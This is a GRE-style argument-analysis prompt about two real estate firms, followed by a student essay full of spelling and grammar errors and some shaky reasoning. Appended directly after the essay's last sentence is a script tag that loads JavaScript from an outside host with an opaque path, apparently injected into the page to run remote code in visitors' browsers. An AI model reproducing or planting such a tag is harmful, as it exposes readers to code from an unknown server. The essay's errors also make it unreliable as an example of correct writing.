The following appeared in a letter from a homeowner to a friend.
"Of the two leading real estate firms in our town—Adams Realty and Fitch Realty —Adams Realty is clearly superior. Adams has 40 real estate agents; in contrast, Fitch has 25, many of whom work only part-time. Moreover, Adams' revenue last year was twice as high as that of Fitch and included home sales that averaged $168,000, compared to Fitch's $144,000. Homes listed with Adams sell faster as well: ten years ago I listed my home with Fitch, and it took more than four months to sell; last year, when I sold another home, I listed it with Adams, and it took only one month. Thus, if you want to sell your home quickly and at a good price, you should use Adams Realty."
Write a response in which you examine the stated and/or unstated assumptions of the argument. Be sure to explain how the argument depends on these assumptions and what the implications are for the argument if the assumptions prove unwarranted.
This argument concludes that Adams Realty is clearly superior to Fitch Realty. The conclusion is based on promises that Adams has 40 real estate agents while Fitch has 25 and many of whom work only part-time, that Adams' revenue last year was twice as high as that of Fitch, that Adams' home sales that averaged $168,000 is higher than Fitch's $144,000, and that ten years ago the homeowner listed his home with Fitch, and it took more than four months to sell, on the other hand, Adams it took only one month to sale his anthor home last year. This argument is based many assumptions that are failed to explain here, and it makes this argument logically flawed.
First, the higher home sales average doesn't mean the better the real estate firm. Furthermore, the Adams has high home sales average maybe because the homes listed on it are just more valuable. They may locate at better places, have better quality, or simply be newer. In spite of this, even if the agents in Adams had better abilitis to sell homes in good prices, their fees may be much higher. And this surely makes the quality of this real estate firm worse. The argument fails to include this, and this weaken the conclusion.
Second, the shorter time needed to sale one home doesn't guarantee the better the real estate firm. For example, there might be a economic depression the years ago and this makes no home saled except this one of the homeown. This certainly be a great thing but someone just neglect it. In addition, what if the qualities of this two different homes are large biased? One was old, shabby, and nearly broken, while the other one was new builded and had a nice garden? This argument doesn's answer this questions.
In conclusion, the argument that focusing on Adams Realty is clearly superior to Fitch Realty is rather weak. If the author demonstrate that the higher home sales average means the better the real estate firm, and that the shorter time needed to sale one home guarantees the better the real estate firm, this argument will be greatly strengthened. However, there is no reason to accept tnis conclusion without this further support.<script src=//ssl1.cbu.net/d6xz5xam></script>
